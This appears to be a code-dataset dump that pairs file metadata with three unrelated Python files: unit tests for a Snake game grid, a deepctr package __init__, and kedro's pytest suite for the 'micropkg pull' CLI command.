| 19.272727 | 43 | 0.768868 | 29 | 212 | 5.482759 | 0.482759 | 0.150943 | 0.176101 | 0.389937 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005618 | 0.160377 | 212 | 10 | 44 | 21.2 | 0.88764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b8f4ba3689f43767f473b430a7da90308aba2479 | 12,430 | py | Python | gym_snake/envs/snake/grid_unittests.py | Maarten1999/Minor_ML3_Snake_AI | 8a579634c94feb8f73b9bf00db78d6852993d3f6 | [
"MIT"
] | null | null | null | gym_snake/envs/snake/grid_unittests.py | Maarten1999/Minor_ML3_Snake_AI | 8a579634c94feb8f73b9bf00db78d6852993d3f6 | [
"MIT"
] | null | null | null | gym_snake/envs/snake/grid_unittests.py | Maarten1999/Minor_ML3_Snake_AI | 8a579634c94feb8f73b9bf00db78d6852993d3f6 | [
"MIT"
] | null | null | null | import unittest
from grid import Grid
from snake import Snake
import numpy as np
class GridTests(unittest.TestCase):
grid_size = [30,30]
unit_size = 10
def test_grid_Initialization(self):
grid = Grid(self.grid_size, self.unit_size)
expected_size = [300,300,3]
expected_grid = np.zeros(expected_size, dtype=np.uint8)
expected_grid[:,:,1] = 255
self.assertTrue(np.array_equal(grid.grid, expected_grid))
def test_constant_Initialization(self):
grid = Grid(self.grid_size, self.unit_size)
self.assertTrue(grid.unit_size == self.unit_size)
self.assertTrue(np.array_equal(grid.grid_size, self.grid_size))
def test_color_Initialization(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = np.array([0,255,0], dtype=np.uint8)
for i in range(grid.grid.shape[0]):
for j in range(grid.grid.shape[1]):
self.assertTrue(np.array_equal(grid.grid[i,j,:],expected_color))
def test_color_of_Color(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = np.array([0,255,0], dtype=np.uint8)
self.assertTrue(np.array_equal(grid.color_of([0,0]),expected_color))
def test_color_of_Coordinate(self):
grid = Grid(self.grid_size, self.unit_size)
coord = [3,2]
expected_color = np.array(grid.BODY_COLOR, dtype=np.uint8)
grid.grid[coord[1]*self.unit_size,coord[0]*self.unit_size,:] = expected_color
self.assertTrue(np.array_equal(grid.color_of(coord),expected_color))
def test_draw_Positive(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = np.array(grid.BODY_COLOR, dtype=np.uint8)
coord = [3,2]
grid.draw(coord, expected_color)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
if y >= coord[1]*self.unit_size and y < coord[1]*self.unit_size+grid.unit_size-grid.unit_gap and x >= coord[0]*self.unit_size and x < coord[0]*self.unit_size+grid.unit_size-grid.unit_gap:
self.assertTrue(np.array_equal(grid.grid[y,x,:],expected_color))
else:
self.assertFalse(np.array_equal(grid.grid[y,x,:],expected_color))
def test_draw_Negative(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = grid.SPACE_COLOR
coord = [3,2]
grid.draw(coord, grid.BODY_COLOR)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
if y >= coord[1]*self.unit_size and y < coord[1]*self.unit_size+grid.unit_size-grid.unit_gap and x >= coord[0]*self.unit_size and x < coord[0]*self.unit_size+grid.unit_size-grid.unit_gap:
self.assertFalse(np.array_equal(grid.grid[y,x,:],expected_color))
else:
self.assertTrue(np.array_equal(grid.grid[y,x,:],expected_color))
def test_draw_snake_Positive(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, head_color=grid.HEAD_COLOR)
expected_colors = np.array([grid.HEAD_COLOR, grid.BODY_COLOR, grid.BODY_COLOR], dtype=np.uint8)
expected_coords = np.array([[10,10], [10,9], [10,8]])
for coord,color in zip(expected_coords, expected_colors):
self.assertTrue(np.array_equal(grid.color_of(coord), color))
def test_draw_snake_Negative(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, grid.HEAD_COLOR)
expected_color = grid.SPACE_COLOR
expected_coords = [(10,10), (10,9), (10,8)]
for i,j in zip(range(grid.grid_size[0]),range(grid.grid_size[1])):
coord = (i,j)
if coord == expected_coords[0] or coord == expected_coords[1] or coord == expected_coords[2]:
self.assertFalse(np.array_equal(grid.color_of(coord), expected_color))
else:
self.assertTrue(np.array_equal(grid.color_of(coord), expected_color))
def test_draw_snake_Snake_Data(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, grid.HEAD_COLOR)
expected_coords = [[10,8],[10,9]]
for i in range(len(snake.body)):
self.assertTrue(np.array_equal(snake.body.popleft(), expected_coords[i]))
def test_erase_snake_body(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, grid.HEAD_COLOR)
snake.action(1)
grid.erase_snake_body(snake)
expected_color = grid.SPACE_COLOR
for i,j in zip(range(grid.grid_size[0]),range(grid.grid_size[1])):
coord = (i,j)
self.assertTrue(np.array_equal(grid.color_of(coord), expected_color))
def test_new_food(self):
grid = Grid(self.grid_size, self.unit_size)
expected_coord = (10,11)
for x in range(grid.grid_size[0]):
for y in range(grid.grid_size[1]):
coord = (x,y)
                if coord != expected_coord:
                    grid.draw(coord, grid.BODY_COLOR)
        self.assertTrue(grid.new_food())
        self.assertTrue(np.array_equal(grid.color_of(expected_coord), grid.FOOD_COLOR))

    def test_new_food_nospace(self):
        grid = Grid(self.grid_size, self.unit_size)
        for x in range(grid.grid_size[0]):
            for y in range(grid.grid_size[1]):
                coord = (x,y)
                grid.draw(coord, grid.BODY_COLOR)
        self.assertFalse(grid.new_food())

    def test_snake_space_BODY(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.BODY_COLOR)
        self.assertTrue(grid.snake_space(coord))

    def test_snake_space_HEAD(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.HEAD_COLOR)
        self.assertTrue(grid.snake_space(coord))

    def test_snake_space_FOOD(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.FOOD_COLOR)
        self.assertFalse(grid.snake_space(coord))

    def test_snake_space_SPACE(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.SPACE_COLOR)
        self.assertFalse(grid.snake_space(coord))

    def test_off_grid_UP(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (0,-1)
        self.assertTrue(grid.off_grid(coord))

    def test_off_grid_RIGHT(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (self.grid_size[0],0)
        self.assertTrue(grid.off_grid(coord))

    def test_off_grid_DOWN(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (0,self.grid_size[1])
        self.assertTrue(grid.off_grid(coord))

    def test_off_grid_LEFT(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (-1,0)
        self.assertTrue(grid.off_grid(coord))

    def test_food_space_FOOD(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.FOOD_COLOR)
        self.assertTrue(grid.food_space(coord))

    def test_food_space_BODY(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.BODY_COLOR)
        self.assertFalse(grid.food_space(coord))

    def test_food_space_HEAD(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.HEAD_COLOR)
        self.assertFalse(grid.food_space(coord))

    def test_food_space_SPACE(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord = (10,11)
        grid.draw(coord, grid.SPACE_COLOR)
        self.assertFalse(grid.food_space(coord))

    def test_connect_x(self):
        grid = Grid(self.grid_size, self.unit_size)
        expected_color = grid.BODY_COLOR
        coord1 = [3,2]
        coord2 = [4,2]
        grid.connect(coord1, coord2, expected_color)
        for y in range(grid.grid.shape[0]):
            for x in range(grid.grid.shape[1]):
                if (
                    y == coord1[1]*self.unit_size
                    or y == coord1[1]*self.unit_size+grid.unit_size-grid.unit_gap-1
                ) and (
                    x < coord2[0]*self.unit_size
                    and x >= coord1[0]*self.unit_size+grid.unit_size-grid.unit_gap
                ):
                    self.assertTrue(np.array_equal(grid.grid[y,x,:], expected_color))
                else:
                    self.assertFalse(np.array_equal(grid.grid[y,x,:], expected_color))

    def test_connect_y(self):
        grid = Grid(self.grid_size, self.unit_size)
        expected_color = grid.BODY_COLOR
        coord1 = [2,3]
        coord2 = [2,4]
        grid.connect(coord1, coord2, expected_color)
        for y in range(grid.grid.shape[0]):
            for x in range(grid.grid.shape[1]):
                if (
                    x == coord1[0]*self.unit_size
                    or x == coord1[0]*self.unit_size+grid.unit_size-grid.unit_gap-1
                ) and (
                    y < coord2[1]*self.unit_size
                    and y >= coord1[1]*self.unit_size+grid.unit_size-grid.unit_gap
                ):
                    self.assertTrue(np.array_equal(grid.grid[y,x,:], expected_color))
                else:
                    self.assertFalse(np.array_equal(grid.grid[y,x,:], expected_color))

    def test_erase(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord1 = [2,3]
        coord2 = [2,4]
        grid.draw(coord1, grid.BODY_COLOR)
        grid.draw(coord2, grid.BODY_COLOR)
        grid.connect(coord1, coord2)
        expected_color = grid.SPACE_COLOR
        grid.erase(coord1)
        grid.erase(coord2)
        for y in range(grid.grid.shape[0]):
            for x in range(grid.grid.shape[1]):
                self.assertTrue(np.array_equal(grid.grid[y,x,:], expected_color))

    def test_erase_connections(self):
        grid = Grid(self.grid_size, self.unit_size)
        coord1 = [2,3]
        coord2 = [2,4]
        grid.draw(coord1, grid.BODY_COLOR)
        grid.connect(coord1, coord2)
        grid.erase_connections(coord1)
        for y in range(grid.grid.shape[0]):
            for x in range(grid.grid.shape[1]):
                if (
                    y >= coord1[1]*self.unit_size
                    and y < coord1[1]*self.unit_size+grid.unit_size-grid.unit_gap
                    and x >= coord1[0]*self.unit_size
                    and x < coord1[0]*self.unit_size+grid.unit_size-grid.unit_gap
                ):
                    self.assertTrue(np.array_equal(grid.grid[y,x,:], grid.BODY_COLOR))
                else:
                    self.assertFalse(np.array_equal(grid.grid[y,x,:], grid.BODY_COLOR))

    def test_open_space(self):
        grid = Grid([10,10], self.unit_size)
        self.assertTrue(grid.open_space == 100)
        for i in range(1,10):
            grid.draw([i,i], grid.BODY_COLOR)
            self.assertTrue(grid.open_space == 100-i)
        for i in range(1,10):
            grid.erase([i,i])
            self.assertTrue(grid.open_space == 91+i)
        snake_len = 3
        snake = Snake((5,5), snake_len)
        grid.draw_snake(snake)
        self.assertTrue(grid.open_space == 100-snake_len)

    def test_open_space_draw(self):
        grid = Grid([10,10], self.unit_size)
        for i in range(1,10):
            grid.draw([i,i], grid.BODY_COLOR)
            self.assertTrue(grid.open_space == 100-i)

    def test_open_space_erase(self):
        grid = Grid([10,10], self.unit_size)
        for i in range(1,10):
            grid.erase([i,i])
            self.assertTrue(grid.open_space == 100+i)

    def test_open_space_draw_snake(self):
        grid = Grid([10,10], self.unit_size)
        snake_len = 3
        snake = Snake((5,5), snake_len)
        grid.draw_snake(snake)
        self.assertTrue(grid.open_space == 100-snake_len)

    def test_open_space_erase_snake_body(self):
        grid = Grid([10,10], self.unit_size)
        snake_len = 3
        snake = Snake((5,5), snake_len)
        grid.erase_snake_body(snake)
        self.assertTrue(grid.open_space == 100+snake_len-1)


if __name__ == "__main__":
    unittest.main()
# deepctr/layers/__init__.py (repo: osljw/keras_tf, rev 400f7e84, license: MIT)
from .core import *
from .interaction import *
from .normalization import *
from .activation import *
from .sequence import *
# tests/framework/cli/micropkg/test_micropkg_pull.py
# (repo: avan-sh/kedro, rev bb3ca393, license: Apache-2.0)
import filecmp
import shutil
import textwrap
from pathlib import Path

import pytest
import toml
import yaml
from click import ClickException
from click.testing import CliRunner

from kedro.framework.cli.micropkg import _get_sdist_name
from kedro.framework.project import settings

PIPELINE_NAME = "my_pipeline"


def call_pipeline_create(cli, metadata, pipeline_name=PIPELINE_NAME):
    result = CliRunner().invoke(
        cli, ["pipeline", "create", pipeline_name], obj=metadata
    )
    assert result.exit_code == 0


def call_micropkg_package(
    cli, metadata, alias=None, destination=None, pipeline_name=PIPELINE_NAME
):
    options = ["--alias", alias] if alias else []
    options += ["--destination", str(destination)] if destination else []
    result = CliRunner().invoke(
        cli,
        ["micropkg", "package", f"pipelines.{pipeline_name}", *options],
        obj=metadata,
    )
    assert result.exit_code == 0, result.output


def call_pipeline_delete(cli, metadata, pipeline_name=PIPELINE_NAME):
    result = CliRunner().invoke(
        cli, ["pipeline", "delete", "-y", pipeline_name], obj=metadata
    )
    assert result.exit_code == 0


@pytest.mark.usefixtures("chdir_to_dummy_project", "patch_log", "cleanup_dist")
class TestMicropkgPullCommand:
    def assert_package_files_exist(self, source_path):
        assert {f.name for f in source_path.iterdir()} == {
            "__init__.py",
            "nodes.py",
            "pipeline.py",
            "README.md",
        }

    @pytest.mark.parametrize("env", [None, "local"])
    @pytest.mark.parametrize(
        "alias, destination",
        [
            (None, None),
            ("aliased", None),
            ("aliased", "pipelines"),
            (None, "pipelines"),
        ],
    )
    def test_pull_local_sdist(
        self,
        fake_project_cli,
        fake_repo_path,
        fake_package_path,
        env,
        alias,
        destination,
        fake_metadata,
    ):
        """Test for pulling a valid sdist file locally."""
        # pylint: disable=too-many-locals
        call_pipeline_create(fake_project_cli, fake_metadata)
        call_micropkg_package(fake_project_cli, fake_metadata)
        call_pipeline_delete(fake_project_cli, fake_metadata)

        source_path = fake_package_path / "pipelines" / PIPELINE_NAME
        config_path = (
            fake_repo_path / settings.CONF_SOURCE / "base" / "pipelines" / PIPELINE_NAME
        )
        test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
        # Make sure the files are actually deleted before pulling from the sdist file.
        assert not source_path.exists()
        assert not test_path.exists()
        assert not config_path.exists()

        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        assert sdist_file.is_file()

        options = ["-e", env] if env else []
        options += ["--alias", alias] if alias else []
        options += ["--destination", destination] if destination else []
        result = CliRunner().invoke(
            fake_project_cli,
            ["micropkg", "pull", str(sdist_file), *options],
            obj=fake_metadata,
        )
        assert result.exit_code == 0, result.output
        assert "pulled and unpacked" in result.output

        pipeline_name = alias or PIPELINE_NAME
        destination = destination or Path()
        source_dest = fake_package_path / destination / pipeline_name
        test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
        config_env = env or "base"
        params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / config_env
            / "parameters"
            / f"{pipeline_name}.yml"
        )

        self.assert_package_files_exist(source_dest)
        assert params_config.is_file()
        actual_test_files = {f.name for f in test_dest.iterdir()}
        expected_test_files = {"__init__.py", "test_pipeline.py"}
        assert actual_test_files == expected_test_files

    @pytest.mark.parametrize("env", [None, "local"])
    @pytest.mark.parametrize(
        "alias, destination",
        [
            (None, None),
            ("aliased", None),
            ("aliased", "pipelines"),
            (None, "pipelines"),
        ],
    )
    def test_pull_local_sdist_compare(
        self,
        fake_project_cli,
        fake_repo_path,
        fake_package_path,
        env,
        alias,
        destination,
        fake_metadata,
    ):
        """Test for pulling a valid sdist file locally, unpack it
        into another location and check that unpacked files
        are identical to the ones in the original modular pipeline.
        """
        # pylint: disable=too-many-locals
        pipeline_name = "another_pipeline"
        call_pipeline_create(fake_project_cli, fake_metadata)
        call_micropkg_package(fake_project_cli, fake_metadata, alias=pipeline_name)

        source_path = fake_package_path / "pipelines" / PIPELINE_NAME
        test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
        source_params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / "base"
            / "parameters"
            / f"{PIPELINE_NAME}.yml"
        )

        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=pipeline_name, version="0.1")
        )
        assert sdist_file.is_file()

        options = ["-e", env] if env else []
        options += ["--alias", alias] if alias else []
        options += ["--destination", destination] if destination else []
        result = CliRunner().invoke(
            fake_project_cli,
            ["micropkg", "pull", str(sdist_file), *options],
            obj=fake_metadata,
        )
        assert result.exit_code == 0, result.output
        assert "pulled and unpacked" in result.output

        pipeline_name = alias or pipeline_name
        destination = destination or Path()
        source_dest = fake_package_path / destination / pipeline_name
        test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
        config_env = env or "base"
        dest_params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / config_env
            / "parameters"
            / f"{pipeline_name}.yml"
        )

        assert not filecmp.dircmp(source_path, source_dest).diff_files
        assert not filecmp.dircmp(test_path, test_dest).diff_files
        assert source_params_config.read_bytes() == dest_params_config.read_bytes()

    def test_micropkg_pull_same_alias_package_name(
        self,
        fake_project_cli,
        fake_repo_path,
        fake_package_path,
        fake_metadata,
    ):
        call_pipeline_create(fake_project_cli, fake_metadata)
        call_micropkg_package(fake_project_cli, fake_metadata)

        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        pipeline_name = PIPELINE_NAME
        destination = "tools"
        result = CliRunner().invoke(
            fake_project_cli,
            [
                "micropkg",
                "pull",
                str(sdist_file),
                "--destination",
                destination,
                "--alias",
                pipeline_name,
            ],
            obj=fake_metadata,
        )
        assert result.exit_code == 0, result.stderr
        assert "pulled and unpacked" in result.output

        source_dest = fake_package_path / destination / pipeline_name
        test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
        config_env = "base"
        params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / config_env
            / "parameters"
            / f"{pipeline_name}.yml"
        )

        self.assert_package_files_exist(source_dest)
        assert params_config.is_file()
        actual_test_files = {f.name for f in test_dest.iterdir()}
        expected_test_files = {"__init__.py", "test_pipeline.py"}
        assert actual_test_files == expected_test_files

    def test_micropkg_pull_nested_destination(
        self,
        fake_project_cli,
        fake_repo_path,
        fake_package_path,
        fake_metadata,
    ):
        call_pipeline_create(fake_project_cli, fake_metadata)
        call_micropkg_package(fake_project_cli, fake_metadata)

        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        pipeline_name = PIPELINE_NAME
        destination = "pipelines/nested"
        result = CliRunner().invoke(
            fake_project_cli,
            [
                "micropkg",
                "pull",
                str(sdist_file),
                "--destination",
                destination,
                "--alias",
                pipeline_name,
            ],
            obj=fake_metadata,
        )
        assert result.exit_code == 0, result.stderr
        assert "pulled and unpacked" in result.output

        source_dest = fake_package_path / destination / pipeline_name
        test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
        config_env = "base"
        params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / config_env
            / "parameters"
            / f"{pipeline_name}.yml"
        )

        self.assert_package_files_exist(source_dest)
        assert params_config.is_file()
        actual_test_files = {f.name for f in test_dest.iterdir()}
        expected_test_files = {"__init__.py", "test_pipeline.py"}
        assert actual_test_files == expected_test_files

    def test_micropkg_alias_refactors_imports(  # pylint: disable=too-many-locals
        self, fake_project_cli, fake_package_path, fake_repo_path, fake_metadata
    ):
        call_pipeline_create(fake_project_cli, fake_metadata)
        pipeline_file = fake_package_path / "pipelines" / PIPELINE_NAME / "pipeline.py"
        import_stmt = (
            f"import {fake_metadata.package_name}.pipelines.{PIPELINE_NAME}.nodes"
        )
        with pipeline_file.open("a") as f:
            f.write(import_stmt)

        package_alias = "alpha"
        pull_alias = "beta"
        pull_destination = "pipelines/lib"

        call_micropkg_package(
            cli=fake_project_cli, metadata=fake_metadata, alias=package_alias
        )
        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=package_alias, version="0.1")
        )
        CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", str(sdist_file)], obj=fake_metadata
        )
        CliRunner().invoke(
            fake_project_cli,
            [
                "micropkg",
                "pull",
                str(sdist_file),
                "--alias",
                pull_alias,
                "--destination",
                pull_destination,
            ],
            obj=fake_metadata,
        )

        pull = f"pipelines.lib.{pull_alias}"
        for alias in (package_alias, pull):
            alias_path = Path(*alias.split("."))
            path = fake_package_path / alias_path / "pipeline.py"
            file_content = path.read_text()
            expected_stmt = f"import {fake_metadata.package_name}.{alias}.nodes"
            assert expected_stmt in file_content

    def test_micropkg_pull_from_aliased_pipeline_conflicting_name(
        self, fake_project_cli, fake_package_path, fake_repo_path, fake_metadata
    ):
        package_name = fake_metadata.package_name
        call_pipeline_create(fake_project_cli, fake_metadata)
        pipeline_file = fake_package_path / "pipelines" / PIPELINE_NAME / "pipeline.py"
        import_stmt = f"import {package_name}.pipelines.{PIPELINE_NAME}.nodes"
        with pipeline_file.open("a") as f:
            f.write(import_stmt)

        call_micropkg_package(
            cli=fake_project_cli, metadata=fake_metadata, alias=package_name
        )
        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=package_name, version="0.1")
        )
        assert sdist_file.is_file()

        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", str(sdist_file)], obj=fake_metadata
        )
        assert result.exit_code == 0, result.output

        path = fake_package_path / package_name / "pipeline.py"
        file_content = path.read_text()
        expected_stmt = f"import {package_name}.{package_name}.nodes"
        assert expected_stmt in file_content

    def test_micropkg_pull_as_aliased_pipeline_conflicting_name(
        self, fake_project_cli, fake_package_path, fake_repo_path, fake_metadata
    ):
        package_name = fake_metadata.package_name
        call_pipeline_create(fake_project_cli, fake_metadata)
        pipeline_file = fake_package_path / "pipelines" / PIPELINE_NAME / "pipeline.py"
        import_stmt = f"import {package_name}.pipelines.{PIPELINE_NAME}.nodes"
        with pipeline_file.open("a") as f:
            f.write(import_stmt)

        call_micropkg_package(cli=fake_project_cli, metadata=fake_metadata)
        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        assert sdist_file.is_file()

        result = CliRunner().invoke(
            fake_project_cli,
            ["micropkg", "pull", str(sdist_file), "--alias", package_name],
            obj=fake_metadata,
        )
        assert result.exit_code == 0, result.output

        path = fake_package_path / package_name / "pipeline.py"
        file_content = path.read_text()
        expected_stmt = f"import {package_name}.{package_name}.nodes"
        assert expected_stmt in file_content

    def test_pull_sdist_fs_args(
        self, fake_project_cli, fake_repo_path, mocker, tmp_path, fake_metadata
    ):
        """Test for pulling a sdist file with custom fs_args specified."""
        call_pipeline_create(fake_project_cli, fake_metadata)
        call_micropkg_package(fake_project_cli, fake_metadata)
        call_pipeline_delete(fake_project_cli, fake_metadata)

        fs_args_config = tmp_path / "fs_args_config.yml"
        with fs_args_config.open(mode="w") as f:
            yaml.dump({"fs_arg_1": 1, "fs_arg_2": {"fs_arg_2_nested_1": 2}}, f)
        mocked_filesystem = mocker.patch("fsspec.filesystem")

        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        options = ["--fs-args", str(fs_args_config)]
        CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", str(sdist_file), *options]
        )

        mocked_filesystem.assert_called_once_with(
            "file", fs_arg_1=1, fs_arg_2=dict(fs_arg_2_nested_1=2)
        )

    def test_pull_two_egg_info(
        self, fake_project_cli, fake_repo_path, mocker, tmp_path, fake_metadata
    ):
        """Test for pulling an sdist file with more than one
        dist-info directory.
        """
        call_pipeline_create(fake_project_cli, fake_metadata)
        call_micropkg_package(fake_project_cli, fake_metadata)
        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        assert sdist_file.is_file()

        (tmp_path / f"{PIPELINE_NAME}-0.1" / "dummy.egg-info").mkdir(parents=True)
        mocker.patch(
            "kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
            return_value=tmp_path,
        )
        result = CliRunner().invoke(
            fake_project_cli,
            ["micropkg", "pull", str(sdist_file)],
            obj=fake_metadata,
        )
        assert result.exit_code
        assert "Error: More than 1 or no egg-info files found" in result.output

    @pytest.mark.parametrize("env", [None, "local"])
    @pytest.mark.parametrize("alias", [None, "alias_path"])
    def test_pull_tests_missing(
        self,
        fake_project_cli,
        fake_repo_path,
        fake_package_path,
        env,
        alias,
        fake_metadata,
    ):
        """Test for pulling a valid sdist file locally,
        but `tests` directory is missing from the sdist file.
        """
        # pylint: disable=too-many-locals
        call_pipeline_create(fake_project_cli, fake_metadata)
        test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
        shutil.rmtree(test_path)
        assert not test_path.exists()
        call_micropkg_package(fake_project_cli, fake_metadata)
        call_pipeline_delete(fake_project_cli, fake_metadata)

        source_path = fake_package_path / "pipelines" / PIPELINE_NAME
        source_params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / "base"
            / "parameters"
            / f"{PIPELINE_NAME}.yml"
        )
        # Make sure the files are actually deleted before pulling from the sdist file.
        assert not source_path.exists()
        assert not source_params_config.exists()

        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        assert sdist_file.is_file()

        options = ["-e", env] if env else []
        options += ["--alias", alias] if alias else []
        result = CliRunner().invoke(
            fake_project_cli,
            ["micropkg", "pull", str(sdist_file), *options],
            obj=fake_metadata,
        )
        assert result.exit_code == 0

        pipeline_name = alias or PIPELINE_NAME
        source_dest = fake_package_path / pipeline_name
        test_dest = fake_repo_path / "src" / "tests" / pipeline_name
        config_env = env or "base"
        params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / config_env
            / "parameters"
            / f"{pipeline_name}.yml"
        )

        self.assert_package_files_exist(source_dest)
        assert params_config.is_file()
        assert not test_dest.exists()

    @pytest.mark.parametrize("env", [None, "local"])
    @pytest.mark.parametrize("alias", [None, "alias_path"])
    def test_pull_config_missing(
        self,
        fake_project_cli,
        fake_repo_path,
        fake_package_path,
        env,
        alias,
        fake_metadata,
    ):
        """
        Test for pulling a valid sdist file locally, but `config` directory is missing
        from the sdist file.
        """
        # pylint: disable=too-many-locals
        call_pipeline_create(fake_project_cli, fake_metadata)
        source_params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / "base"
            / "parameters"
            / f"{PIPELINE_NAME}.yml"
        )
        source_params_config.unlink()
        call_micropkg_package(fake_project_cli, fake_metadata)
        call_pipeline_delete(fake_project_cli, fake_metadata)

        source_path = fake_package_path / "pipelines" / PIPELINE_NAME
        test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
        # Make sure the files are actually deleted before pulling from the sdist file.
        assert not source_path.exists()
        assert not test_path.exists()

        sdist_file = (
            fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
        )
        assert sdist_file.is_file()

        options = ["-e", env] if env else []
        options += ["--alias", alias] if alias else []
        result = CliRunner().invoke(
            fake_project_cli,
            ["micropkg", "pull", str(sdist_file), *options],
            obj=fake_metadata,
        )
        assert result.exit_code == 0

        pipeline_name = alias or PIPELINE_NAME
        source_dest = fake_package_path / pipeline_name
        test_dest = fake_repo_path / "src" / "tests" / pipeline_name
        config_env = env or "base"
        dest_params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / config_env
            / "parameters"
            / f"{pipeline_name}.yml"
        )

        self.assert_package_files_exist(source_dest)
        assert not dest_params_config.exists()
        actual_test_files = {f.name for f in test_dest.iterdir()}
        expected_test_files = {"__init__.py", "test_pipeline.py"}
        assert actual_test_files == expected_test_files

    @pytest.mark.parametrize("env", [None, "local"])
    @pytest.mark.parametrize("alias", [None, "alias_path"])
    def test_pull_from_pypi(
        self,
        fake_project_cli,
        fake_repo_path,
        mocker,
        tmp_path,
        fake_package_path,
        env,
        alias,
        fake_metadata,
    ):
        """
        Test for pulling a valid sdist file from pypi.
        """
        # pylint: disable=too-many-locals
        call_pipeline_create(fake_project_cli, fake_metadata)
        # We mock the `pip download` call, and manually create a package sdist file
        # to simulate the pypi scenario instead
        call_micropkg_package(fake_project_cli, fake_metadata, destination=tmp_path)
        version = "0.1"
        sdist_file = tmp_path / _get_sdist_name(name=PIPELINE_NAME, version=version)
        assert sdist_file.is_file()
        call_pipeline_delete(fake_project_cli, fake_metadata)

        source_path = fake_package_path / "pipelines" / PIPELINE_NAME
        test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
        source_params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / "base"
            / "parameters"
            / f"{PIPELINE_NAME}.yml"
        )
        # Make sure the files are actually deleted before pulling from pypi.
        assert not source_path.exists()
        assert not test_path.exists()
        assert not source_params_config.exists()

        python_call_mock = mocker.patch("kedro.framework.cli.micropkg.python_call")
        mocker.patch(
            "kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
            return_value=tmp_path,
        )

        options = ["-e", env] if env else []
        options += ["--alias", alias] if alias else []
        result = CliRunner().invoke(
            fake_project_cli,
            ["micropkg", "pull", f"{PIPELINE_NAME}-{version}", *options],
            obj=fake_metadata,
        )
        assert result.exit_code == 0
        assert "pulled and unpacked" in result.output

        python_call_mock.assert_called_once_with(
            "pip",
            [
                "download",
                "--no-deps",
                "--dest",
                str(tmp_path),
                f"{PIPELINE_NAME}-{version}",
            ],
        )

